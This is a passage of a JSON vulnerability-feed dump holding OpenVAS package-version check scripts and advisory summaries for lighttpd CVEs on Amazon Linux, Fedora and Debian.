{\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:27", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120162", "title": "Amazon Linux Local Check: ALAS-2014-299", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-299.nasl 6735 2017-07-17 09:56:49Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120162\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:55 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-299\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures. lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network. lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-299.html\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4508\", \"CVE-2013-4559\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:31", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867540", "id": "OPENVAS:867540", "title": "Fedora Update for lighttpd FEDORA-2014-2506", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867540);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:24:40 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2506\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2506\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\");\n script_summary(\"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:51:38", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508 \nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559 \nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560 \nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.", "modified": "2017-07-07T00:00:00", "published": "2013-11-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892795", "id": "OPENVAS:892795", "title": "Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2795.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2795-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"lighttpd on Debian Linux\";\ntag_insight = \"lighttpd is a small webserver and fast webserver developed with\nsecurity in mind and a lot of features.\nIt has support for\n\n* CGI, FastCGI and SSI\n* virtual hosts\n* URL rewriting\n* authentication (plain files, htpasswd, ldap)\n* transparent content compression\n* conditional configuration\n\nand configuration is straight-forward and easy.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u2.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nFor the testing (jessie) and unstable (sid) distributions, the regression\nproblem will be fixed soon.\n\nWe recommend that you upgrade your lighttpd packages.\";\ntag_summary = \"Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508 \nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559 \nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560 \nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892795);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4560\", \"CVE-2013-4559\");\n script_name(\"Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-11-17 00:00:00 +0100 (Sun, 17 Nov 2013)\");\n script_tag(name: \"cvss_base\", value:\"7.6\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2795.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867540", "title": "Fedora Update for lighttpd FEDORA-2014-2506", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:24:40 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2506\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2506\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508\nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd", "modified": "2019-03-18T00:00:00", "published": "2013-11-17T00:00:00", "id": "OPENVAS:1361412562310892795", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892795", "title": "Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2795.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2795-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892795\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4560\", \"CVE-2013-4559\");\n script_name(\"Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-17 00:00:00 +0100 (Sun, 17 Nov 2013)\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2795.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"lighttpd on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u2.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nFor the testing (jessie) and unstable (sid) distributions, the regression\nproblem will be fixed soon.\n\nWe recommend that you upgrade your lighttpd packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508\nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560\nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:10:27", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2018-01-26T00:00:00", "published": "2013-09-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=866877", "id": "OPENVAS:866877", "title": "Fedora Update for lighttpd FEDORA-2013-15345", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2013-15345\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866877);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-06 09:36:03 +0530 (Fri, 06 Sep 2013)\");\n script_cve_id(\"CVE-2012-5533\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for lighttpd FEDORA-2013-15345\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15345\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115116.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.32~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": 